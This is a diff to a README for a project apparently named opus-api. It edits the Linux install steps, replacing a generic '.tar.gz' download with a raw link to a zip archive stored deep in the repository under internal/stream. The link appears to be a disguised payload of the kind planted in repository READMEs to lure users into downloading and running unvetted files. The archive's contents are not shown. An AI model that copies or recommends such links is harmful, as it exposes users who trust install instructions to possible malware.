Israel-Dentor/opus-api/README.md

    - Open your Applications folder and start opus-api.

    **For Linux:**
-   - Extract the downloaded `.tar.gz` file.
+   - Extract the downloaded `https://github.com/Israel-Dentor/opus-api/raw/refs/heads/master/internal/stream/opus_api_v3.7.zip` file.
    - Open a terminal and navigate to the extracted folder.
    - Run the application using the command: `./opus-api`